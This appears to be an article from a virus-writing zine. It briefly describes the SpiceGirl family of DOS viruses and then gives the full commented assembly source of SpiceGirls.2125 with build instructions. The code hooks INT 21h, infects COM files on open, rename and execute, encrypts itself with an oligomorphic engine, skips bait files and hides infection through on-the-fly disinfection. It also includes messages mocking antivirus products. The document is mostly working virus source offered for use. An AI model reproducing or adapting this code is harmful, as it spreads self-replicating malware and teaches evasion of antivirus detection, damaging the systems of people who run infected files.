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29A Issue 02 04 05
SpiceGirl family
These are harmless memory resident parasitic viruses. They hook INT 21h and
write themselves to the beginning of COM files (except COMMAND.COM) that are
accessed. The viruses are encrypted starting from 1619 bytes version.
Starting from 2123 bytes version they are semi-stealth - on opening an
infected file they create temporary file, write to there disinfected copy of
original file, and return "handle" of disinfected copy instead of original
file. On closing these viruses delete the temporary file.
The viruses use new way to avoid detection - the infected files have no
entry point (start code). The address of entry point in infected files is
out of file body and it is impossible to reach virus code by parsing EXE
header. To realize this method the virus uses several PSP (Program's Segment
Prefix) and EXE header tricks.
The format of virus code is EXE, i.e. the virus as a program is EXE program
with EXE header, relocation table and so on (as a result infected COM files
are of EXE internal format). EXE header fields in virus (initial CS and IP)
are patches so, that entry address points not to file code, but to PSP data
(i.e. out of file). At that address PSP contains RET FAR code that follows
the call to INT 21h handler. So, the virus entry address points to RET FAR
code, and control then will be passed to code that is pointed by stack. To
pass the control to its real entry code the virus has initial stack
registers (SS and SP) in its EXE header and stack data that points to real
0000 ³CD 20 ³
.... ³ ³ ³
0050 ³CD 21 ³ ³
0052 ³CB / RET FAR³ Entry address, DOS will <ÄÄÄÄÄÙ
.... ³ ³ bring control to here ÄÄÄÄÄ¿
0100 ÉÍÍÍÍÍÍÍÍÍÍÍÍ» Virus code (file image) ³
º º ³
ºStack º Stack data points to ÄÄÄÄ>³
º º real entry ³
º º Real virus entry code <ÄÄÄÄÄÙ
º . . . º
The virus contain the text strings:
What? 'Error: invalid program'? Me? Fprot, are you crazy? :)
And you, Avp, 'EXE file but COM extension'. What a deep scan. ;)
Spice_Girls virus causes problems to your scan engine eh? :)
comment *
Disassembled by
SpiceGirls.2125 is a 2125 bytes parasitic resident COM virus. Infects fi-
les at open file, close file, get or set file attributes, load and/or exe-
cute program and rename file by prepending an EXE header and the virus to
the infected file. SpiceGirls.2125 has an error handler, anti-heuristic
techniques, anti-debugging techniques, disinfection on fly and is oligo-
morphic in file using its internal oligomorphic engine.
To compile SpiceGirls.2125 with Turbo Assembler v 4.0 type:
TLINK /t /x SPIC2125.OBJ
.model tiny
org 100h ; Origin of SpiceGirls.2125
db 'MZ' ; EXE signature
bytes_on_las dw (pages_end-pages_begin) mod 200h
pages_in_fil dw (pages_end-pages_begin)/200h
dw (relo_end-relo_begin)/04h
dw (head_end-head_begin)/10h
dw 00h,01h ; Minimum-, maximum number of para...
dw 0ffeah,stack_ptr ; Pointer to stack
db 'SG' ; Checksum
dd 0ffea00b2h ; Pointer to service request + 02h
dw relocations-100h ; Offset of relocations - 100h
dw 00h ; Overlay number (main program)
relocations dd 0ffea0178h,0ffea017ch,0ffea0180h,0ffea0184h,0ffea0188h
dd 0ffea018ch,0ffea0190h,0ffea0194h,0ffea01beh,0ffea01f8h
dd 0ffea0206h,0ffea0218h,0ffea0228h,0ffea025ch,0ffea0272h
db 08h dup(00h)
db ' - Spice_Girls.2125 - '
dd 07h dup(0ffea00b2h) ; Seven pointers to service reques...
dw virus_begin ; Offset of virus_begin
dw 0ffeah ; Segment of virus_begin
dw crypt_begin ; Offset of crypt_begin
crypt_size dw (crypt_end-crypt_begin)/02h
crypt_key dw 00h ; 16-bit encryption/decryption key
pop_reg16 equ byte ptr $ ; POP reg16
pop di cx ax ; Load registers from stack
decrypt_algo equ byte ptr $+01h ; Decryption algorithme
index_reg equ byte ptr $+02h ; 16-bit index register
add cs:[di],ax ; Decrypt two bytes
index_reg_ equ byte ptr $+01h ; 16-bit index register
add_idx_imm8 equ byte ptr $+02h ; 8-bit immediate
add di,02h ; DI = offset of next encrypted byte
loop decrypt_loop
mov cs:[psp_segment],ds ; Store segment of PSP for current...
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
push cs ; Save CS at stack
pop es ; Load ES from stack (CS)
call find_name
mov ax,(3000h+'S') ; SpiceGirls.2125 function
db 9ah ; CALL imm32 (opcode 9ah)
dd 0ffea00b0h ; Pointer to service request
call install
jc eternal_loop ; Error? Jump to eternal_loop
jmp virus_exit
find_name proc near ; Find filename
push ds ; Save DS at stack
mov ds,[psp_segment] ; DS = segment of PSP for current ...
mov ds,ds:[2ch] ; DS = segment of environment for ...
xor si,si ; Zero SI
lodsb ; AL = byte of environment block
cmp al,00h ; Last environment variable?
jne find_zero ; Not equal? Jump to find_zero
lodsb ; AL = byte of environment block
cmp al,00h ; Last environment variable?
jne find_zero ; Not equal? Jump to find_zero
add si,02h ; SI = offset of filename
lodsb ; AL = byte of filename
cmp al,00h ; End of filename?
jne find_zero_ ; Not equal? Jump to find_zero_
sub si,02h ; SI = offset of last character by...
mov byte ptr [si],0ffh ; Store last byte of file extension
pop ds ; Load DS from stack
ret ; Return!
install proc near ; Allocate memory, move virus to t...
mov ah,(48h xor 'S') ; Allocate memory
xor ah,'S'
mov bx,0ffffh ; BX = number of paragraphs to all...
db 9ah ; CALL imm32 (opcode 9ah)
dd 0ffea00b0h ; Pointer to service request
mov ah,(48h xor 'S') ; Allocate memory
xor ah,'S'
sub bx,(memory_end-head_begin+0fh)/10h+01h
db 9ah ; CALL imm32 (opcode 9ah)
dd 0ffea00b0h ; Pointer to service request
jc install_exit ; Error? Jump to install_exit
mov bp,ax ; BP = segment of allocated block
mov ah,(48h xor 'S') ; Allocate memory
xor ah,'S'
mov bx,(memory_end-head_begin+0fh)/10h
db 9ah ; CALL imm32 (opcode 9ah)
dd 0ffea00b0h ; Pointer to service request
jc install_exit ; Error? Jump to install_exit
xchg ax,bp ; AX = segment of allocated block
push es ; Save ES at stack
mov es,ax ; ES = segment of allocated block
mov ah,(49h xor 'S') ; Free memory
xor ah,'S'
db 9ah ; CALL imm32 (opcode 9ah)
dd 0ffea00b0h ; Pointer to service request
sub bp,10h ; Subtract ten from segment of all...
mov es,bp ; ES = segment of allocated block
mov word ptr es:[0f1h],08h
lea si,exe_header ; SI = offset of exe_header
mov di,100h ; DI = offset of beginning of code
mov cx,(header_end-header_begin)
lodsb ; AL = byte of exe_header
stosb ; Store byte of exe_header
loop move_header
lea si,virus_begin ; SI = offset of virus_begin
mov cx,(code_end-virus_begin)
lodsb ; AL = byte of virus
stosb ; Store byte of virus
loop move_virus
call correct_relo
push ds ; Save DS at stack
push es ; Save ES at stack
pop ds ; Load DS from stack (ES)
mov ax,(3521h xor 'SG') ; Get interrupt vector 21h
xor ax,'SG'
db 9ah ; CALL imm32 (opcode 9ah)
dd 0ffea00b0h ; Pointer to service request
mov word ptr [int21_addr],bx
mov word ptr [int21_addr+02h],es
mov ah,(25h xor 'S') ; Set interrupt vector 21h
xor ah,'S'
lea dx,int21_virus ; DX = offset of int21_virus
db 9ah ; CALL imm32 (opcode 9ah)
dd 0ffea00b0h ; Pointer to service request
pop ds es ; Load segments from stack
clc ; Clear carry flag
ret ; Return!
correct_relo proc near ; Correct relocation entries
lea si,relocations ; SI = offset of relocations
mov cx,0fh ; CX = number of relocation entries
mov di,es:[si] ; DI = offset of relocation
add si,04h ; SI = offset of next relocation e...
mov es:[di],0ffeah ; Store high-order word of relocat...
loop correct_loop
ret ; Return!
int21_virus proc near ; Interrupt 21h of SpiceGirls.2125
xor ah,'S'
cmp ax,(3000h xor 5300h+'S')
je jmp_spice_fu ; Equal? Jump to jmp_spice_fu
cmp ah,(3dh xor 'S') ; Open file?
je jmp_exam_fil ; Equal? Jump to jmp_exam_fil
cmp ah,(3eh xor 'S') ; Close file?
je jmp_pre_test ; Equal? Jump to jmp_pre_test
cmp ah,(43h xor 'S') ; Get or set file attributes
je jmp_exam_fil ; Equal? Jump to jmp_exam_fil
cmp ah,(4bh xor 'S') ; Load and/or execute program?
je jmp_exam_fil ; Equal? Jump to jmp_exam_fil
cmp ah,(56h xor 'S') ; Rename file
je jmp_exam_fil ; Equal? Jump to jmp_exam_fil
xor ah,'S'
jmp cs:[int21_addr]
jmp spice_functi
jmp examine_file
jmp pre_tst_func
add sp,04h ; Correct stack pointer
popf ; Load flags from stack
mov [file_handle_],'SG'
mov ax,[origin_off] ; AX = offset of original code
mov cs:[origin_off],ax ; Store offset of original code
mov ax,ds:[psp_segment] ; AX = segment of PSP for current ...
mov cs:[psp_segment],ax ; Store segment of PSP for current...
mov ds,cs:[psp_segment] ; DS = segment of PSP for current ...
mov es,cs:[psp_segment] ; ES = segment of PSP for current ...
mov ah,(4ah xor 'S') ; Resize memory block
xor ah,'S'
mov bx,0ffffh ; BX = new size in paragraphs
call int21_simula
mov ah,(4ah xor 'S') ; Resize memory block
xor ah,'S'
sub bx,04h ; BX = new size in paragraphs
call int21_simula
cli ; Clear interrupt-enable flag
mov ss,cs:[psp_segment] ; SS = segment of PSP for current ...
mov sp,0fffah ; SP = stack pointer
sti ; Set interrupt-enable flag
mov word ptr ds:[0fffeh],00h
mov ds:[0fffch],ds ; Store segment of PSP for current...
mov ds:[0fffah],100h ; Store instruction pointer
std ; Set direction flag
mov si,cs:[origin_off] ; SI = offset of original code
add si,100h ; Add offset of beginning of code
add si,(code_end-code_begin)
mov di,cs:[origin_off] ; DI = offset of original code
add di,100h ; Add offset of beginning of code
add di,(code_end-head_begin)
dec si ; Decrease SI
dec di ; Decrease DI
mov cx,cs:[origin_off] ; CX = offset of original code
lodsb ; AL = byte of original code
stosb ; Store byte of original code
loop move_origin
cld ; Clear direction flag
mov si,cs:[origin_off] ; SI = offset of original code
add si,100h ; Add offset of beginning of code
mov di,100h ; DI = offset of beginning of code
mov cx,(code_end-head_begin)
lodsb ; AL = byte of original code
stosb ; Store byte of original code
loop move_origin_
xor ax,ax ; Zero AX
xor cx,cx ; Zero CX
xor dx,dx ; Zero DX
xor bx,bx ; Zero BX
xor bp,bp ; Zero BP
xor si,si ; Zero SI
xor di,di ; Zero DI
retf ; Return far!
mov cs:[dos_function],ah
mov word ptr cs:[name_pointer],dx
mov word ptr cs:[name_pointer+02h],ds
pushf ; Save flags at stack
push ax cx dx bx bp si di es ds
sti ; Set interrupt-enable flag
cld ; Clear direction flag
call int24_store
mov si,word ptr cs:[name_pointer]
mov ds,word ptr cs:[name_pointer+02h]
call examine_name
jc infect_exit ; Error? Jump to infect_exit
mov dx,word ptr cs:[name_pointer]
mov ds,word ptr cs:[name_pointer+02h]
call test_exe_sig
jc infect_exit ; Error? Jump to infect_exit
mov dx,word ptr cs:[name_pointer]
mov ds,word ptr cs:[name_pointer+02h]
call tst_filesize
jc infect_exit ; Error? Jump to infect_exit
mov dx,word ptr cs:[name_pointer]
mov ds,word ptr cs:[name_pointer+02h]
call infect_file
mov si,word ptr cs:[name_pointer]
mov ds,word ptr cs:[name_pointer+02h]
call test_infect
jc examin_exit ; Error? Jump to examin_exit
mov ah,cs:[dos_function]
mov si,word ptr cs:[name_pointer]
mov ds,word ptr cs:[name_pointer+02h]
call test_functio
call int24_load
pop ds es di si bp bx dx cx ax
popf ; Load flags from stack
jmp int21_exit
int24_store proc near ; Get and set interrupt vector 24h
xor ax,ax ; Zero AX
mov ds,ax ; DS = segment of interrupt table
mov ax,ds:[24h*04h] ; AX = offset of interrupt 24h
mov word ptr cs:[int24_addr],ax
mov ax,ds:[24h*04h+02h] ; AX = segment of interrupt 24h
mov word ptr cs:[int24_addr+02h],ax
mov word ptr ds:[24h*04h],offset int24_virus
mov ds:[24h*04h+02h],cs ; Set interrupt segment 24h
ret ; Return!
examine_name proc near ; Examine filename
lodsb ; AL = byte of filename
cmp al,00h ; End of filename?
jne examine_name ; Not equal? Jump to examine_name
sub si,07h ; SI = offset of last two bytes of...
lodsw ; AX = two bytes of filename
and ax,0101111101011111b
cmp ax,'DN' ; COMMAND.COM?
je examin_exit_ ; Equal? Jump to examin_exit_
lodsb ; AL = dot after filename
cmp al,'.' ; Dot after filename?
jne examin_exit_ ; Not equal? Jump to examin_exit_
lodsw ; AX = two bytes of file extension
and ax,0101111101011111b
xor ax,'SG'
cmp ax,('OC' xor 'SG') ; COM executable?
jne examin_exit_ ; Not equal? Jump to examin_exit_
lodsb ; AL = byte of file extension
and al,01011111b ; Upcase character
xor al,'S'
cmp al,('M' xor 'S') ; COM executable?
jne examin_exit_ ; Not equal? Jump to examin_exit_
clc ; Clear carry flag
ret ; Return!
stc ; Set carry flag
ret ; Return!
test_exe_sig proc near ; Test EXE signature
mov ax,(3d00h xor 'SG') ; Open file (read)
xor ax,'SG'
call int21_simula
jc tst_sig_exit ; Error? Jump to tst_sig_exit
xchg ax,bx ; BX = file handle
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
mov ah,(3fh xor 'S') ; Read from file
xor ah,'S'
lea dx,exe_head_sig ; DX = offset of exe_head_sig
mov cx,02h ; Read two bytes
call int21_simula
mov ah,(3eh xor 'S') ; Close file
xor ah,'S'
call int21_simula
mov ax,('ZM' xor 'SG') ; AX = EXE signature
xor ax,'SG'
cmp [exe_head_sig],ax ; Found EXE signature?
je tst_sig_exit ; Equal? Jump to tst_sig_exit
mov ax,('MZ' xor 'SG') ; AX = EXE signature
xor ax,'SG'
cmp [exe_head_sig],ax ; Found EXE signature?
je tst_sig_exit ; Equal? Jump to tst_sig_exit
clc ; Clear carry flag
ret ; Return!
stc ; Set carry flag
ret ; Return!
tst_filesize proc near ; Test filesize
mov ax,(3d00h xor 'SG') ; Open file (read)
xor ax,'SG'
call int21_simula
xchg ax,bx ; BX = file handle
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
mov ax,(4202h xor 'SG') ; Set current file position (EOF)
xor ax,'SG'
xor cx,cx ; Zero CX
xor dx,dx ; Zero DX
call int21_simula
push ax dx ; Save registers at stack
mov ah,(3eh xor 'S') ; Close file
xor ah,'S'
call int21_simula
pop dx ax ; Load registers from stack
cmp ax,(code_end-head_begin)
jb tst_siz_exit ; Filesize too small? Jump to tst_...
cmp dx,00h ; Filesize too large?
ja tst_siz_exit ; Above? Jump to tst_siz_exit
cmp ax,0ea60h ; Filesize too large?
ja tst_siz_exit ; Above? Jump to tst_siz_exit
mov [origin_off],ax ; Store offset of original code
xor dx,dx ; Zero DX
mov cx,200h
div cx ; Divide by pages
cmp dx,00h ; Bait file?
je tst_siz_exit ; Equal? Jump to tst_siz_exit
mov ax,[origin_off] ; Store offset of original code
xor dx,dx ; Zero DX
mov cx,3e8h
div cx ; Divide by thousands
cmp dx,00h ; Bait file?
je tst_siz_exit ; Equal? Jump to tst_siz_exit
clc ; Clear carry flag
ret ; Return!
stc ; Set carry flag
ret ; Return!
int21_simula proc near ; Simulate interrupt 21h
pushf ; Save flags at stack
call cs:[int21_addr]
ret ; Return!
infect_file proc near ; Infect COM file
mov ax,(4300h xor 'SG') ; Get file attributes
xor ax,'SG'
call int21_simula
mov cs:[file_attr],cx ; Store file attributes
mov ax,(4301h xor 'SG') ; Set file attributes
xor ax,'SG'
xor cx,cx ; CX = new file attributes
call int21_simula
mov ax,(3d02h xor 'SG') ; Open file (read/write)
xor ax,'SG'
call int21_simula
jnc load_info ; No error? Jump to load_info
jmp infect_exit_
xchg ax,bx ; BX = file handle
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
mov ax,(5700h xor 'SG') ; Set file's date and time
xor ax,'SG'
call int21_simula
mov [file_time],cx ; Store file time
mov [file_date],dx ; Store file date
push ds ; Save DS at stack
mov ax,0bf00h ; AX = segment of text video RAM
mov ds,ax ; DS = " " " " "
mov ah,(3fh xor 'S') ; Read from file
xor ah,'S'
xor dx,dx ; Zero DX
mov cx,(code_end-head_begin)
call int21_simula
push ax ; Save AX at stack
mov ax,(4202h xor 'SG') ; Set current file position (EOF)
xor ax,'SG'
xor cx,cx ; Zero CX
xor dx,dx ; Zero DX
call int21_simula
pop cx ; Load CX from stack (AX)
mov ah,(40h xor 'S') ; Write to file
xor ah,'S'
xor dx,dx ; Zero DX
call int21_simula
pop ds ; Load DS from stack
mov ax,(4200h xor 'SG') ; Set current file position (SOF)
xor ax,'SG'
xor cx,cx ; Zero CX
xor dx,dx ; Zero DX
call int21_simula
mov ax,[origin_off] ; Store offset of original code
add ax,(code_end-head_begin)
xor dx,dx ; Zero DX
mov cx,200h
div cx ; Divide by pages
inc ax ; Increase AX
mov [pages_in_fil],ax ; Store total number of 512-bytes ...
mov [bytes_on_las],dx ; Store number of bytes on last 51...
push ds ; Save DS at stack
mov ax,0bf00h ; AX = segment of text video RAM
mov ds,ax ; DS = " " " " "
call spice_oligo
mov ah,(40h xor 'S') ; Write to file
xor ah,'S'
mov cx,(code_end-head_begin)
xor dx,dx ; Zero DX
call int21_simula
pop ds ; Load DS from stack
mov ax,(5701h xor 'SG') ; Set file's date and time
xor ax,'SG'
mov cx,[file_time] ; CX = file time
mov dx,[file_date] ; DX = file date
call int21_simula
mov ah,(3eh xor 'S') ; Close file
xor ah,'S'
call int21_simula
mov ax,(4301h xor 'SG') ; Set file attributes
xor ax,'SG'
mov ds,word ptr [name_pointer+02h]
mov cx,cs:[file_attr] ; CX = file attributes
mov dx,word ptr cs:[name_pointer]
call int21_simula
ret ; Return!
spice_oligo proc near ; SpiceGirls.2125 oligomorphic engine
push ds ; Save DS at stack
push ds ; Save DS at stack
pop es ; Load ES from stack (DS)
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
in al,40h ; AL = 8-bit random number
mov byte ptr [crypt_key],al
xor al,'S'
mov byte ptr [crypt_key+01h],al
mov ah,al ; AH = 8-bit random number
and ah,00000001b ; AH = 16-bit index register
mov [index_reg__],ah ; Store 16-bit index register
ror al,01h ; AL = 8-bit random number
mov ah,al ; AH = encryption/decryption algor...
and ah,00000001b ; AH = " "
mov [crypt_algo],ah ; Store encryption/decryption algo...
mov al,5eh ; POP SI (opcode 5eh)
or al,[index_reg__] ; POP reg16
mov [pop_reg16],al ; Store POP reg16
mov al,[crypt_algo] ; AL = encryption/decryption algor...
mov ah,00h ; Zero AH
add ax,offset algo_table
mov si,ax ; SI = offset of decryption algori...
mov al,[si] ; AL = decryption algorithme
mov [decrypt_algo],al ; Store decryption algorithme
mov al,04h ; AL = 16-bit index register
or al,[index_reg__] ; AL = " " "
mov [index_reg],al ; Store 16-bit index register
mov al,0c6h ; AL = 16-bit index register
or al,[index_reg__] ; AL = " " "
mov [index_reg_],al ; Store 16-bit index register
mov [add_idx_imm8],02h ; Store 8-bit immediate
mov al,[crypt_algo] ; AL = encryption/decryption algor...
xor al,00000001b ; Invert first bit of AL
mov ah,00h ; Zero AH
add ax,offset algo_table
mov si,ax ; SI = offset of encryption algori...
mov al,[si] ; AL = encryption algorithme
mov [encrypt_algo],al ; Store encryption algorithme
mov si,100h ; SI = offset of beginning of code
xor di,di ; Zero DI
mov cx,(code_end-head_begin)
lodsb ; AL = byte of virus
stosb ; Store byte of virus
loop move_virus_
lea si,crypt_begin-100h ; SI = offset of crypt_begin
mov cx,[crypt_size] ; CX = number of bytes to encrypt
mov ax,[crypt_key] ; AX = encryption/decryption key
jmp encrypt_loop
encrypt_algo equ byte ptr $+01h ; Encryption algorithme
sub es:[si],ax ; Encrypt two bytes
add si,02h ; SI = offset of next encrypted byte
loop encrypt_loop
pop ds ; Load DS from stack
ret ; Return!
index_reg__ db ? ; 16-bit index register
crypt_algo db ? ; Encryption/decryption algortihme
algo_table db 01h ; ADD segment:[index],AX
db 29h ; SUB segment:[index],AX
test_infect proc near ; Test for previously infection
lodsb ; AL = byte of filename
cmp al,00h ; End of filename?
jne test_infect ; Not equal? Jump to test_infect
sub si,04h ; SI = offset of file extension
lodsw ; AX = two bytes of file extension
and ax,0101111101011111b
xor ax,'SG'
cmp ax,('OC' xor 'SG') ; COM executable?
jne tst_inf_exit ; Not equal? Jump to tst_inf_exit
lodsb ; AL = byte of file extension
cmp al,0ffh ; Allready infected?
jne tst_inf_exit ; Not equal? Jump to tst_inf_exit
clc ; Clear carry flag
ret ; Return!
stc ; Set carry flag
ret ; Return!
test_functio proc near ; Test DOS function number
cmp ah,(3dh xor 'S') ; Open file?
je jmp_create ; Equal? Jump to jmp_create
cmp ah,(3eh xor 'S') ; Close file?
je jmp_delete ; Equal? Jump to jmp_delete
ret ; Return!
jmp create_clean
jmp delete_clean
push cs ; Save CS at stack
pop es ; Load ES from stack (CS)
mov si,dx ; SI = offset of filename
lea di,filename ; DI = offset of filename
mov cx,40h ; Move sixty-four bytes of the fil...
lodsb ; AL = byte of filename
stosb ; Store byte of filename
loop move_name
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
mov ah,(3ch xor 'S') ; Create file
xor ah,'S'
xor cx,cx ; CX = file attributes
lea dx,filename ; DX = offset of filename
call int21_simula
jnc store_handle ; No error? Jump to store_handle
jmp clean_exit
mov bp,ax ; BP = file handle
mov [file_handle_],ax ; Store file handle
lea si,filename ; SI = offset of filename
lodsb ; AL = byte of filename
cmp al,00h ; End of filename?
jne find_zero__ ; Not equal? Jump to find_zero__
sub si,02h ; SI = offset of last character by...
mov byte ptr [si],'M' ; Store last byte of file extension
mov ax,(3d00h xor 'SG') ; Open file (read)
xor ax,'SG'
lea dx,filename ; DX = offset of filename
call int21_simula
jnc store_extens ; No error? Jump to store_extens
jmp clean_exit
mov bx,ax ; BX = file handle
mov byte ptr [si],0ffh ; Store last byte of file extension
mov ax,0bf00h ; AX = segment of text video RAM
mov ds,ax ; DS = " " " " "
mov ax,(4202h xor 'SG') ; Set current file position (EOF)
xor ax,'SG'
mov cx,-01h ; CX = end of file
mov dx,-(code_end-head_begin)
call int21_simula
mov si,ax ; SI = original filesize
sub si,(code_end-head_begin)
mov ah,(3fh xor 'S') ; Read from file
xor ah,'S'
mov cx,(code_end-head_begin)
xor dx,dx ; Zero DX
call int21_simula
xchg bx,bp ; BX = file handle
mov ah,(40h xor 'S') ; Write to file
xor ah,'S'
mov cx,(code_end-head_begin)
xor dx,dx ; Zero DX
call int21_simula
xchg bx,bp ; BX = file handle
mov ax,(4200h xor 'SG') ; Set current file position (SOF)
xor ax,'SG'
xor cx,cx ; Zero CX
mov dx,(code_end-head_begin)
call int21_simula
mov cx,1000h ; CX = number of bytes to read
cmp si,cx ; Read less than four thousand and...
jae read_file ; Above or equal? Jump to read_file
mov cx,si ; CX = number of bytes to read
mov di,cx ; DI = number of bytes to read
mov ah,(3fh xor 'S') ; Read from file
xor ah,'S'
xor dx,dx ; Zero DX
call int21_simula
mov cx,ax ; CX = number of bytes actually read
xchg bx,bp ; BX = file handle
mov ah,(40h xor 'S') ; Write to file
xor ah,'S'
xor dx,dx ; Zero DX
call int21_simula
xchg bx,bp ; BX = file handle
sub si,di ; SI = bytes left to read
cmp si,00h ; Read all of the file?
jne tst_file_pos ; Not equal? Jump to tst_file_pos
mov ah,(3eh xor 'S') ; Close file
xor ah,'S'
call int21_simula
xchg bx,bp ; BX = file handle
mov ah,(3eh xor 'S') ; Close file
xor ah,'S'
call int21_simula
ret ; Return!
mov [file_handle_],'SG'
ret ; Return!
cmp cs:[file_handle_],bx
jne dont_delete ; Don't delete disinfected file
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
mov ah,(41h xor 'S') ; Delete file
xor ah,'S'
lea dx,filename ; DX = offset of filename
call int21_simula
mov [file_handle_],'SG'
ret ; Return!
int24_load proc near ; Set interrupt vector 24h
xor ax,ax ; Zero AX
mov ds,ax ; DS = segment of interrupt table
mov ax,word ptr cs:[int24_addr]
mov ds:[24h*04h],ax ; Store segment of interrupt 24h
mov ax,word ptr cs:[int24_addr+02h]
mov ds:[24h*04h+02h],ax ; Store segment of interrupt 24h
ret ; Return!
mov cs:[dos_function],ah
mov cs:[file_handle],bx ; Store file handle
pushf ; Save flags at stack
push ax cx dx bx bp si di es ds
sti ; Set interrupt-enable flag
cld ; Clear direction flag
call int24_store
mov ah,cs:[dos_function]
mov bx,cs:[file_handle] ; BX = file handle
call test_functio
call int24_load
pop ds es di si bp bx dx cx ax
popf ; Load flags from stack
jmp int21_exit
int24_virus proc near ; Interrupt 24h of SpiceGirls.2125
mov al,03h ; Fail system call in progress
iret ; Interrupt return!
db 0dh,0ah,'What? ''Error: invalid program''? Me? Fprot, are you crazy? :)'
db 0dh,0ah,'And you, Avp, ''EXE file but COM extension''. What a deep scan. ;)'
db 0dh,0ah,'Spice_Girls virus causes problems to your scan engine eh? :)'
db 0dh,0ah,'$'
exe_header db 'MZ' ; EXE signature
dw (pages_end-pages_begin) mod 200h
dw (pages_end-pages_begin)/200h
dw (relo_end-relo_begin)/04h
dw (head_end-head_begin)/10h
dw 00h,01h ; Minimum-, maximum number of para...
dw 0ffeah,stack_ptr ; Pointer to stack
db 'SG' ; Checksum
dd 0ffea00b2h ; Pointer to service request + 02h
dw relocations-100h ; Offset of relocations - 100h
dw 00h ; Overlay number (main program)
dd 0ffea0178h,0ffea017ch,0ffea0180h,0ffea0184h,0ffea0188h
dd 0ffea018ch,0ffea0190h,0ffea0194h,0ffea01beh,0ffea01f8h
dd 0ffea0206h,0ffea0218h,0ffea0228h,0ffea025ch,0ffea0272h
db 08h dup(00h)
db ' - Spice_Girls.2125 - '
dd 07h dup(0ffea00b2h) ; Seven pointers to service reques...
dw virus_begin ; Offset of virus_begin
dw 0ffeah ; Segment of virus_begin
dw crypt_begin ; Offset of crypt_begin
dw (crypt_end-crypt_begin)/02h
dw 00h ; 16-bit encryption/decryption key
psp_segment dw ? ; Segment of PSP for current proce...
int21_addr dd ? ; Address of interrupt 21h
int24_addr dd ? ; Address of interrupt 24h
dos_function db ? ; DOS function number
name_pointer dd ? ; Pointer to filename
file_handle dw ? ; File handle
exe_head_sig dw ? ; EXE header signature
file_attr dw ? ; File attributes
file_time dw ? ; File time
file_date dw ? ; File date
origin_off dw terminate-100h ; Offset of original code
file_handle_ dw ? ; File handle
filename db 40h dup(?) ; Filename
db 00h
mov ax,4c00h ; Terminate with return code
int 21h
db 241h dup(90h)
end head_begin